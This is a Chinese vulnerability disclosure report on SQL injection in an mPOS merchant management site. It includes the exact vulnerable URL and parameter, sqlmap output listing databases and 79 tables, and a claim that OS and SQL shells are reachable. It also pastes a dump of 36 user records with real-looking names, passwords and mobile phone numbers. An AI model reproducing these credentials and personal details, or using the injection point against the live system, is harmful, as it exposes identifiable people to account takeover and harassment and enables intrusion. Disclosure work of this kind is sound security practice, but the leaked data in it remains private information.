2015-11-23: 细节已通知厂商并且等待厂商处理中 2015-11-27: 厂商已经确认,细节仅向厂商公开 2015-12-07: 细节向核心白帽子及相关领域专家公开 2015-12-17: 细节向普通白帽子公开 2015-12-27: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
厂商是联汇通宝存在注入http://mpos.unionpay.so:8383/manager/system/noticeContent.aspx?action=view&id=13&target=mpos id=back-end DBMS: Microsoft SQL Server 2008available databases [10]:[*] channel[*] distribution[*] dy_cd_lhtb[*] lhtmposmerchant[*] master[*] model[*] msdb[*] railroad[*] tempdb[*] trainsms可执行-os-shellsql-shell
存在的表:
Database: lhtmposmerchant[79 tables]+-------------------------------+| db_area || db_billorder_record || db_bulletin || db_channel_applyUsheild || db_channel_dayprofit || db_channel_product_costconfig || db_channel_product_type || db_channel_profitstatistics || db_channel_rechargelog || db_city || db_credit_usedquota || db_lhb_user || db_lhbblackgold_jsrecord || db_lhbblackgold_profit || db_lhbdebit_credit_order || db_lhbgold_profit || db_lhbjhc_jsrecord || db_lhbjhc_profit || db_lhbjhf_jsrecord || db_lhbjhf_profit || db_lhbjhn_jsrecord || db_lhbjhn_profit || db_lhbjht_jsrecord || db_lhbjht_profit || db_lhbjhy_jsrecord || db_lhbjhy_profit || db_lhbptgold_jsrecord || db_lhbptgold_profit || db_lhbrate_config || db_lhbsilver_profit || db_lhbvipos_order || db_lhbwhitegold_profit || db_lhbyz_channelrate || db_lhbyzrate_config || db_lhmall_order_product || db_lhmall_order_product || db_lhplaneTicket_order || db_lhtmpos_billlog || db_lhtmpos_billorder || db_lhtmpos_order || db_lhtmpos_txnorder || db_lhtrainTicket_order || db_lhtrate_config || db_lhtvipos_order || db_lhtvipos_rates || db_liquidationbankcode || db_log || db_member || db_menu || db_merchant_config || db_mpos_channelassign || db_mpos_channelassign || db_mpos_channelrate || db_mpos_lhbrate || db_mpos_merchant || db_mpos_terminal || db_newlhb_user || db_noqrhmobile || db_pay_product_log || db_power || db_product_apply || db_product_buyrecords || db_product_class || db_product_data || db_product_salecost_config || db_product_salecost_config || db_product_saleman || db_province || db_role || db_sellagency || db_sms_send || db_sms_wait || db_subdistributor || db_tempmobile || db_terminal_user || db_user || db_vipuser_rate || db_youze_profitstatistics || sqlmapoutput |+-------------------------------+
部分用户
select * from db_user [36]:[*] 01 2 2014 1:16PM, , 448, 1, VIPOS-陶善忠, 176335, 9, 3, 0, 0, 13032191313[*] 01 2 2014 2:29PM, , 449, 1, VIPOS-王晓鹤, wxh800918, 9, 3, 0, 0, 15312155678[*] 01 2 2014 3:12PM, , 450, 1, VIPOS-徐育红, 218321, 9, 3, 0, 0, 13962412277[*] 01 2 2014 3:18PM, , 451, 1, VIPOS-陈芳, 206323, 9, 3, 0, 0, 18962636627[*] 01 2 2014 4:20PM, , 452, 1, VIPOS-纪海, 192179, 9, 3, 0, 0, 15618389748[*] 01 2 2014 4:29PM, , 453, 1, VIPOS-胡国宏, 242510, 9, 3, 0, 0, 15901994055[*] 01 2 2014 4:50PM, , 454, 1, VIPOS-蒋海, 103619, 9, 3, 0, 0, 18914950187[*] 01 2 2014 9:44AM, , 447, 1, VIPOS-欧林芝, 250546, 9, 3, 0, 0, 13611933901[*] 01 3 2014 1:52PM, , 456, 1, VIPOS-王成璋, 043210, 9, 3, 0, 0, 13882177061[*] 01 3 2014 2:05PM, , 457, 1, VIPOS-吴慧红, 096026, 9, 3, 0, 0, 15800359836[*] 01 3 2014 11:11AM, , 455, 1, VIPOS-路纯, 017533, 9, 3, 0, 0, 13732671518[*] 01 6 2014 1:07PM, , 461, 1, VIPOS-甘霖, 220042, 9, 3, 0, 0, 13939945338[*] 01 6 2014 1:32PM, , 462, 1, VIPOS-庞大江, 249180, 9, 3, 0, 0, 13375151875[*] 01 6 2014 2:04PM, , 463, 1, VIPOS-裴学丽, 8888, 8, 2, 1, 0, peixueli[*] 01 6 2014 2:11PM, , 464, 1, VIPOS-向荣, 01724X, 9, 3, 0, 0, 13983211607[*] 01 6 2014 2:31PM, , 465, 1, VIPOS-杨竹丽, 160885, 9, 3, 0, 0, 13698886899[*] 01 6 2014 4:32PM, , 468, 1, VIPOS-丁裕菊, 075827, 9, 3, 0, 0, 13906282112[*] 01 6 2014 11:02AM, , 459, 1, VIPOS-孙培培, 030489, 9, 3, 0, 0, 18616122858[*] 01 6 2014 12:00AM, , 458, 10, 汪霞白-财务, 123, 5, 1, 0, 0, wangxiabai[*] 01 6 2014 12:53PM, , 460, 1, VIPOS-江抗军, 20641X, 9, 3, 0, 0, 18962887688[*] 01 6 2014 12:53PM, , 460, 1, VIPOS-江抗军, 20641X, 9, 3, 0, 0, 18962887688[*] 01 6 2014 12:53PM, , 460, 1, VIPOS-江抗军, 20641X, 9, 3, 0, 0, 18962887688[*] 01 6 2015 8:49AM, , 1392, 1, VIPOS-RHXT刘林, 115411, 9, 3, 0, 0, 13458678768[*] 01 7 2014 1:02PM, , 470, 1, VIPOS-陆俊华, 280813, 9, 3, 0, 0, 15001991029[*] 01 7 2014 1:02PM, , 470, 1, VIPOS-陆俊华, 280813, 9, 3, 0, 0, 15001991029[*] 01 7 2014 1:02PM, , 470, 1, VIPOS-陆俊华, 280813, 9, 3, 0, 0, 15001991029[*] 01 7 2014 4:56PM, , 472, 1, VIPOS-唐秋儿, 8888, 8, 2, 1, 0, tangqiuer[*] 01 7 2014 12:00AM, , 115, 1, VIPOS-李文娟, 8888, 8, 2, 1, 0, liwenjuan[*] 01 7 2014 12:01PM, , 469, 1, VIPOS-王晓鹤, 8888, 8, 2, 1, 0, wangxiaohe[*] 01 7 2015 1:32PM, , 1397, 1, VIPOS-RHXT娄晓倩, 115411, 9, 3, 0, 0, 15881576086[*] 01 7 2015 1:33PM, , 1398, 1, VIPOS-董樊, 115411, 9, 3, 0, 0, 15928406481[*] 01 7 2015 10:27AM, , 1395, 1, VIPOS-冯高峰, 264911, 9, 3, 0, 0, 13541222112[*] 01 7 2015 10:28AM, , 1396, 1, VIPOS-刘昌建, 264911, 9, 3, 0, 0, 13540490546[*] 01 8 2014 9:31AM, , 474, 1, VIPOS-陆文俊, socl8899, 9, 3, 0, 0, 13918788846[*] 01 8 2014 9:39AM, , 475, 1, VIPOS-张金凤, 015042, 9, 3, 0, 0, 13918190877[*] 01 8 2014 12:00AM, , 477, 1, VIPOS-王玲凤, 118913, 8, 2, 1, 0, wlf
大部分密码很简单,管理员存在123类似弱口令
后台可发送验证码,可发送短信,验证么可见
可以查看其它用户密码,
泄露用户资料
危害等级:高
漏洞Rank:13
确认时间:2015-11-27 13:44
CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。
暂无
